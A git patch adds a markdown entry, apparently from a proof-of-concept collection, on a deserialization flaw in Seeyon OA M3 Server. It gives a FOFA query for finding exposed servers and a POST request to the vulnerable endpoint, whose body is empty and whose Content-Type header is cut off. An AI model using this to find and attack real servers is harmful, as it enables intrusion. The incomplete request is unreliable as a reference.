From d4334d3667f9ca7669aa7544e1907a264990d361 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Thu, 23 Nov 2023 21:15:59 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E8=87=B4=E8=BF=9COA=20M3=20Server=20?=
 =?UTF-8?q?=E5=8F=8D=E5=BA=8F=E5=88=97=E5=8C=96=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 致远OA M3 Server 反序列化漏洞.md | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 致远OA M3 Server 反序列化漏洞.md

diff --git a/致远OA M3 Server 反序列化漏洞.md b/致远OA M3 Server 反序列化漏洞.md
new file mode 100644
index 0000000..3ec42bb
--- /dev/null
+++ b/致远OA M3 Server 反序列化漏洞.md	
@@ -0,0 +1,24 @@
+
+## 致远OA M3 Server 反序列化漏洞
+
+## fofa
+```
+"M3-Server 已启动"
+```
+
+根据群友说，这个漏洞是fastjson反序列化
+## poc
+```
+POST /mobile_portal/api/pns/message/send/batch/6_1sp1 HTTP/1.1
+Host: {{Hostname}}
+User-Agent: Mozilla/5.0 
+Content-Type: application/x-www-form-urlencod
+
+
+```
+![ef21d114d1965815537db98570d2daf7](https://github.com/wy876/POC/assets/139549762/b3609c72-0516-4c69-a64f-62c86fffb30d)
+
+##漏洞分析
+```
+https://mp.weixin.qq.com/s/czbhaf7jpNmgjAt-OFWmIA
+```